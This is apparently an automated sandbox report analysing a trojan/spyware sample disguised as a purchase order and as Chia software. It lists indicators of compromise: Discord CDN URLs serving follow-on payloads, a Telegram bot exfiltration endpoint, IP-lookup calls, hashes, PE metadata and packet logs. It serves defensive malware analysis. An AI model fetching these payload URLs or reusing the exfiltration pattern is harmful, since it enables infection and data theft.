http://checkip.dyndns.com	0%	Avira URL Cloud	safe
http://checkip.dyndns.org4Tk	0%	Avira URL Cloud	safe
https://freegeoip.app/xml/LoadCountryNameClipboard	0%	URL Reputation	safe
https://freegeoip.app/xml/LoadCountryNameClipboard	0%	URL Reputation	safe
https://freegeoip.app/xml/LoadCountryNameClipboard	0%	URL Reputation	safe
http://freegeoip.app	0%	URL Reputation	safe
http://freegeoip.app	0%	URL Reputation	safe
http://freegeoip.app	0%	URL Reputation	safe
https://freegeoip.app/xml/84.17.52.78	0%	URL Reputation	safe
https://freegeoip.app/xml/84.17.52.78	0%	URL Reputation	safe
https://freegeoip.app/xml/84.17.52.78	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cdn.discordapp.com	162.159.135.233	true	false	high
freegeoip.app	172.67.188.154	true	false	unknown
checkip.dyndns.com	162.88.193.70	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	Avira URL Cloud: safe	unknown
http://cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://freegeoip.app/xml/	PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://freegeoip.app/xml/84.17.52.78x	PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe	PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000000.00000002.661917531.00000000028D6000.00000004.00000001.sdmp	false		high
http://cdn.discordapp.com	PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp	false		high
http://cdn.discordapp.com4Tkp~	PURCHASE ORDER E3007921.EXE, 00000000.00000002.661909146.00000000028C2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://checkip.dyndns.org/HB	PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://freegeoip.app	PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://checkip.dyndns.orgD8Tk	PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8	PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	false		high
http://checkip.dyndns.org	PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com4Tk	PURCHASE ORDER E3007921.EXE, 00000000.00000002.661803714.000000000281C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://freegeoip.app4Tk	PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.com	PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org4Tk	PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com	PURCHASE ORDER E3007921.EXE, 00000000.00000002.661917531.00000000028D6000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/841595401253158954/841595626680221726/asd;IsolatedStorage.pac	PURCHASE ORDER E3007921.EXE	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PURCHASE ORDER E3007921.EXE, 00000000.00000002.661803714.000000000281C000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	false		high
https://freegeoip.app/xml/LoadCountryNameClipboard	PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exeJ	PURCHASE ORDER E3007921.EXE	false		high
https://cdn.discordapp.com/attachments/841595401253158954/841595626680221726/asd	PURCHASE ORDER E3007921.EXE, 00000000.00000002.661791074.0000000002811000.00000004.00000001.sdmp	false		high
http://freegeoip.app	PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://freegeoip.app/xml/84.17.52.78	PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.88.193.70	checkip.dyndns.com	United States	33517	DYNDNSUS	false
162.159.135.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
172.67.188.154	freegeoip.app	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	410994
Start date:	11.05.2021
Start time:	14:32:20
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PURCHASE ORDER E3007921.EXE
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@3/1@5/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 0% (good quality ratio 0%) Quality average: 73% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 100% Number of executed functions: 31 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .EXE
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 40.88.32.150, 204.79.197.200, 13.107.21.200, 92.122.145.220, 168.61.161.212, 104.42.151.234, 13.64.90.137, 20.82.209.183, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 205.185.216.42, 205.185.216.10, 20.82.210.154 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/410994/sample/PURCHASE ORDER E3007921.EXE

Simulations

Behavior and APIs

Time	Type	Description
14:33:16	API Interceptor	1x Sleep call for process: PURCHASE ORDER E3007921.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.88.193.70	order 39305.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	XPBPS2DL.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	INQUIRY.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	0908000000.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Nuovo ordine _WJO-001, pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	PDF.09336642.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Updated Order list -804333.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.Win32.Save.a.32673.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Qoute.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	FPI_0485010214.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	SOA..exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Order 122001-220 Guangzhou_pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Potwierdzenie Transakcji_20210505_123255.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	3e241556_by_Libranalysis.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	proforma invoice No. 42037,pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	eHV0IaHe2btEhvP.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	5ihsPbk16njhJ9x.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Quotation-27-04-2021_PDF.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	vessel details.xlsx	Get hash	malicious	Browse	checkip.dyndns.org/
	Wh00Ny9HXk.exe	Get hash	malicious	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	Waybill Document 22700456.exe	Get hash	malicious	Browse	162.159.133.233
	755c95c8_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.134.233
	98c87992_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.133.233
	0908000000.exe	Get hash	malicious	Browse	162.159.129.233
	AS90800009000000.exe	Get hash	malicious	Browse	162.159.130.233
	New Order PO#42617.exe	Get hash	malicious	Browse	162.159.135.233
	QbaOijF6WG.exe	Get hash	malicious	Browse	162.159.135.233
	New order list.exe	Get hash	malicious	Browse	162.159.130.233
	cfe14e87_by_Libranalysis.rtf	Get hash	malicious	Browse	162.159.130.233
	Il nuovo ordine e nell'elenco allegato.exe	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Discord.8711.exe	Get hash	malicious	Browse	162.159.135.233
	8B1C960881FC789460B5B274ABD43BADDB1C92E1A942D.exe	Get hash	malicious	Browse	162.159.134.233
	Spetrum-invoice-95144511.vbs	Get hash	malicious	Browse	162.159.133.233
	Swift-Correction.exe	Get hash	malicious	Browse	162.159.130.233
	QLODCmfl1h.exe	Get hash	malicious	Browse	162.159.135.233
	products order pdf .exe	Get hash	malicious	Browse	162.159.130.233
	Contract_Documents_pdf.exe	Get hash	malicious	Browse	162.159.133.233
	Purchase Order 002393440.exe	Get hash	malicious	Browse	162.159.135.233
	Notice of payment of 04.05.2021.exe	Get hash	malicious	Browse	162.159.135.233
	9a4b975c_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.130.233
freegeoip.app	ORDER PO-168-05102021.exe	Get hash	malicious	Browse	172.67.188.154
	be8928c5_by_Libranalysis.exe	Get hash	malicious	Browse	104.21.19.200
	Octamod 2021 -#U2026P014 New Order.exe	Get hash	malicious	Browse	172.67.188.154
	PURCHASE_ORDER_0098_PDF.exe	Get hash	malicious	Browse	104.21.19.200
	Invoice.exe	Get hash	malicious	Browse	172.67.188.154
	0000195221990024.exe	Get hash	malicious	Browse	172.67.188.154
	S.O.A.exe	Get hash	malicious	Browse	172.67.188.154
	Consignment Details.exe	Get hash	malicious	Browse	172.67.188.154
	Original Receipt.exe	Get hash	malicious	Browse	172.67.188.154
	order 39305.exe	Get hash	malicious	Browse	172.67.188.154
	eb57884e_by_Libranalysis.xlsx	Get hash	malicious	Browse	172.67.188.154
	Eliorhcq.exe	Get hash	malicious	Browse	172.67.188.154
	purchase order.exe	Get hash	malicious	Browse	172.67.188.154
	XPBPS2DL.exe	Get hash	malicious	Browse	172.67.188.154
	79cc8c05_by_Libranalysis.xlsx	Get hash	malicious	Browse	172.67.188.154
	TWI-SHA 202102.exe	Get hash	malicious	Browse	104.21.19.200
	Reconfirm invoice.exe	Get hash	malicious	Browse	104.21.19.200
	INQUIRY.exe	Get hash	malicious	Browse	104.21.19.200
	0908000000.exe	Get hash	malicious	Browse	104.21.19.200
	Nuovo ordine _WJO-001, pdf.exe	Get hash	malicious	Browse	104.21.19.200

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	ORDER PO-168-05102021.exe	Get hash	malicious	Browse	172.67.188.154
	Waybill Document 22700456.exe	Get hash	malicious	Browse	162.159.133.233
	be8928c5_by_Libranalysis.exe	Get hash	malicious	Browse	104.21.19.200
	Purchase Order.exe	Get hash	malicious	Browse	104.21.32.235
	Octamod 2021 -#U2026P014 New Order.exe	Get hash	malicious	Browse	172.67.188.154
	PURCHASE_ORDER_0098_PDF.exe	Get hash	malicious	Browse	104.21.19.200
	Invoice.exe	Get hash	malicious	Browse	172.67.188.154
	New Order.exe	Get hash	malicious	Browse	23.227.38.74
	3kURg3sVdn.exe	Get hash	malicious	Browse	104.21.15.11
	0000195221990024.exe	Get hash	malicious	Browse	172.67.188.154
	TPV5CBWxMf.exe	Get hash	malicious	Browse	104.21.86.143
	FuiZSHt8Hx.dll	Get hash	malicious	Browse	104.20.184.68
	slot Charges.exe	Get hash	malicious	Browse	23.227.38.74
	QvGe1ACVtQ.exe	Get hash	malicious	Browse	172.67.188.120
	755c95c8_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.134.233
	#Ud83d#Udce9-vesna.starcevic.htm	Get hash	malicious	Browse	104.18.11.207
	FA42jRFW5U.exe	Get hash	malicious	Browse	172.67.160.253
	k7RjPyffkU.exe	Get hash	malicious	Browse	104.21.15.11
	tjcEHwn7c5.exe	Get hash	malicious	Browse	104.21.85.176
	fVp0qHaDXO.exe	Get hash	malicious	Browse	104.21.86.143
DYNDNSUS	ORDER PO-168-05102021.exe	Get hash	malicious	Browse	216.146.43.70
	be8928c5_by_Libranalysis.exe	Get hash	malicious	Browse	216.146.43.70
	Octamod 2021 -#U2026P014 New Order.exe	Get hash	malicious	Browse	216.146.43.70
	PURCHASE_ORDER_0098_PDF.exe	Get hash	malicious	Browse	216.146.43.70
	Invoice.exe	Get hash	malicious	Browse	216.146.43.70
	0000195221990024.exe	Get hash	malicious	Browse	131.186.113.70
	S.O.A.exe	Get hash	malicious	Browse	131.186.161.70
	Consignment Details.exe	Get hash	malicious	Browse	131.186.161.70
	Original Receipt.exe	Get hash	malicious	Browse	131.186.161.70
	order 39305.exe	Get hash	malicious	Browse	162.88.193.70
	eb57884e_by_Libranalysis.xlsx	Get hash	malicious	Browse	216.146.43.71
	Eliorhcq.exe	Get hash	malicious	Browse	216.146.43.70
	purchase order.exe	Get hash	malicious	Browse	131.186.161.70
	XPBPS2DL.exe	Get hash	malicious	Browse	162.88.193.70
	79cc8c05_by_Libranalysis.xlsx	Get hash	malicious	Browse	216.146.43.71
	TWI-SHA 202102.exe	Get hash	malicious	Browse	216.146.43.70
	Reconfirm invoice.exe	Get hash	malicious	Browse	216.146.43.70
	INQUIRY.exe	Get hash	malicious	Browse	162.88.193.70
	0908000000.exe	Get hash	malicious	Browse	162.88.193.70
	Nuovo ordine _WJO-001, pdf.exe	Get hash	malicious	Browse	162.88.193.70

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	ORDER PO-168-05102021.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	Waybill Document 22700456.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	be8928c5_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	Octamod 2021 -#U2026P014 New Order.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	Invoice.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	0000195221990024.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	Z4uLK26mIK.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	S.O.A.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	Consignment Details.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	Original Receipt.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	order 39305.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	Eliorhcq.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	purchase order.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	NEW PO - CE AUSTRALIA PTY LTD.xls	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	XPBPS2DL.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	TWI-SHA 202102.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	Reconfirm invoice.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	INQUIRY.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	0908000000.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154
	Nuovo ordine _WJO-001, pdf.exe	Get hash	malicious	Browse	162.159.135.233 172.67.188.154

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASE ORDER E3007921.EXE.log Download File
Process:	C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.365622957937216
Encrypted:	false
SSDEEP:	24:ML9E4Ks29E4KnKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84j:MxHKX9HKnYHKhQnoPtHoxHhAHKzvKvj
MD5:	FC95B72FA9788BDF0B8075C768FFDCEB
SHA1:	2ED2BE675DAF980B3061A622CBF795050F9A68DC
SHA-256:	37D8549A8145090B163B3C5D4A91231AFE1F66E7C1A7203BDE5D48147B0C3B5E
SHA-512:	B6CDA7870B3154B1D77663E4005EFA1C4EA210F955456FC8F8B2445FFCD52B41EAFAC2144E4F1B3BC86D4604F0E86DF5664921C354B313EF7E256162D604E459
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutra

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	1.8966520089456975
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PURCHASE ORDER E3007921.EXE
File size:	31744
MD5:	dac3ac141a3e0abb27839284a1df864c
SHA1:	8802717f07d933b2478b0cae6f410cce79b9f0a9
SHA256:	9af68d42d1d36c20d81306679715a6f7e3d427d8c039344653f4ec6b43cd7ac5
SHA512:	3d984a6a4d689d950d8a3e55b2ec6901f4525ae8e7cce41be7ee0267cd9808da20c30ff9de43715b57b613a946215bf37aea999e5ac79e2ab1d7b63fc9d994f0
SSDEEP:	192:E9Viq8E/DO7EB7p+N7sHw7P+zwTZOjAn96M:G18ka7EB72uW+zwTZOjAn9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<G.`.....................l.......,... ...@....@.. ....................................@................................

File Icon


Icon Hash:	1717489679719640

Static PE Info

General
Entrypoint:	0x402cee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x609A473C [Tue May 11 08:58:36 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2c94	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x69c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcf4	0xe00	False	0.529575892857	data	4.95511240442	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x69c0	0x6a00	False	0.069538620283	data	1.32356051301	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x4130	0x6328	data
RT_GROUP_ICON	0xa458	0x14	data
RT_VERSION	0xa46c	0x368	data
RT_MANIFEST	0xa7d4	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2021 Chia Network
Assembly Version	0.0.0.0
InternalName	younglog.exe
FileVersion	1.1.4.0
CompanyName	Chia Network
Comments	GUI for Chia Blockchain
ProductName	GUI for Chia Blockchain
ProductVersion	1.1.4.0
FileDescription	Setup.exe
OriginalFilename	younglog.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 11, 2021 14:33:15.114756107 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.155576944 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.155699015 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.195472002 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.237544060 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.240009069 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.240041971 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.240061998 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.240098000 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.245935917 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.288002968 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.288227081 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.343419075 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.384366989 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.412494898 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.412520885 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.412543058 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.412559986 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.412583113 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.412607908 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.412731886 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.413424015 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.413451910 CEST	443	49736	162.159.135.233	192.168.2.4
